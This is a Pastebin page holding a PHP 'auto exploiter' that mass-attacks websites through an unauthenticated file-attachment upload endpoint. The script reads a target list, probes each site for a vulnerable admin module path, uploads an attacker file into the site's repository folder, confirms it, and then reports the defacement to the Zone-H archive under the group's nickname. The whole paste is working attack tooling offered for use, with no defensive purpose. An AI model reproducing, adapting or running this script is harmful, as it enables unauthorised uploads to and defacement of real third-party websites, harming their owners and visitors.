daily pastebin goal
16%
SHARE
TWEET

Auto Exploiter File Attachment + Zone-H

choirurrizal Mar 4th, 2018 443 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. # ShinChan - N45HT - N45HT.WEB.ID
  4. fb.com/ShinChan.admin - fb.com/N45HTOfficial - fb.com/groups/N45HTOfficial
  5. # shinchan0x1945@gmail.com
  6.  
  7. # your list.txt must a single directory with this exploiter #
  8.  
  9.  
  10. ##########################################################
  11. # Terimakasih kepada semua teman teman yang membantu membuat Exploiter ini
  12. # Exploiter ini mungkin tidak 100% work, soalnya bot njay
  13.  
  14. # Special thanks : PETR03X - Comod0x - Grav3 - FRU_403
  15.                    SCYTHE404_LOL - All Members N45HT
  16. ##########################################################
  17.  
  18. # note : jangan hapus copyright, hargai pembuat
  19.  
  20.  
  21.  
  22. # coded by ShinChan - N45HT | 04/03/2018
  23. */
  24. echo "
  25.  ___  _  _  __  _  _  __  _  _   __   _  _     _    _  ____  ___
  26. / __)( )( )(  )( \( )/ _)( )( ) (  ) ( \( )   ( \/\/ )(_  _)(  _)
  27. \__ \ )__(  )(  )  (( (_  )__(  /__\  )  (  ___\    /   )(   ) _)
  28. (___/(_)(_)(__)(_)\_)\__)(_)(_)(_)(_)(_)\_)(___)\/\/   (__) (_)  
  29.       File Attachment Auto Exploiter - coded by ShinChan
  30.  
  31.  Thanks to :  PETR03X - Mr.x0x - SCYTHE404_LOL - ./Mr.Blank007
  32.                        All Members N45HT
  33.  
  34.  
  35. ";
  36. echo "Input your target list: ";
  37. $list = trim(fgets(STDIN));
  38.  
  39. $shell = "indoxx.txt";
  40. $nickzoneh = "N45HT";
  41. $exploit = "/admin/modules/bibliography/pop_attach.php";
  42. $path = "/repository/";
  43.  
  44. $open = fopen("$list","r");
  45. $size = filesize("$list");
  46. $read = fread($open,$size);
  47. $lists = explode("\r\n",$read);
  48.  
  49. echo "\n";
  50.  
  51. foreach($lists as $target){
  52.     if(!preg_match("/^http:\/\//",$target) AND !preg_match("/^https:\/\//",$target)){
  53.         $targets = "http://$target";
  54.     }else{
  55.         $targets = $target;
  56.     }
  57.    
  58.     echo "Target => $targets\n";
  59.     echo "  [*] Checking Path : ";
  60.  
  61.     $cd = curl_init("$targets$exploit");
  62.     curl_setopt($cd, CURLOPT_FOLLOWLOCATION, 1);
  63.     curl_setopt($cd, CURLOPT_RETURNTRANSFER, 1);
  64.     curl_exec($cd);
  65.     $httpcode = curl_getinfo($cd, CURLINFO_HTTP_CODE);
  66.     curl_close($cd);
  67.    
  68.     if($httpcode == 200){
  69.         echo "200 OK\n";
  70.         echo "  [*] Uploading shell : ";
  71.         $ch = curl_init();
  72.         curl_setopt($ch, CURLOPT_URL, "$targets/$exploit");
  73.         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  74.         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  75.         curl_setopt($ch, CURLOPT_POST, 1);
  76.         curl_setopt($ch, CURLOPT_POSTFIELDS, array("fileTitle"=>"shinchan" , "file2attach"=>"@$shell" , "upload"=>"Unggah Sekarang"));
  77.         curl_exec($ch);
  78.        
  79.         $cek = curl_init();
  80.         curl_setopt($cek, CURLOPT_URL, "$targets$path$shell");
  81.         curl_setopt($cek, CURLOPT_FOLLOWLOCATION, 1);
  82.         curl_setopt($cek, CURLOPT_RETURNTRANSFER, 1);
  83.         $ceek = curl_exec($cek);
  84.         $ceeks = curl_getinfo($cek, CURLINFO_HTTP_CODE);
  85.        
  86.         if(preg_match("/hacked/",$ceek) or $ceeks == 200){
  87.             echo "OK $targets$path$shell\n";
  88.             echo "  [*] Zone-H : ";
  89.             $zh = curl_init("http://zone-h.org/notify/single");
  90.             curl_setopt($zh, CURLOPT_FOLLOWLOCATION, 1);
  91.             curl_setopt($zh, CURLOPT_RETURNTRANSFER, 1);
  92.             curl_setopt($zh, CURLOPT_POST, 1);
  93.             curl_setopt($zh, CURLOPT_POSTFIELDS, array("defacer"=>"$nickzoneh","domain1"=>"$targets$path$shell","hackmode"=>"18","reason"=>"5"));
  94.  
  95.             $postzh = curl_exec($zh);
  96.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i",$postzh)){
  97.                 echo "OK\n\n";
  98.             }else{
  99.                 echo "NO\n\n";
  100.             }
  101.         }else{
  102.             echo "Failed\n\n";
  103.         }
  104.     }else{
  105.         echo "Not Vulnerable\n\n";
  106.     }
  107. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top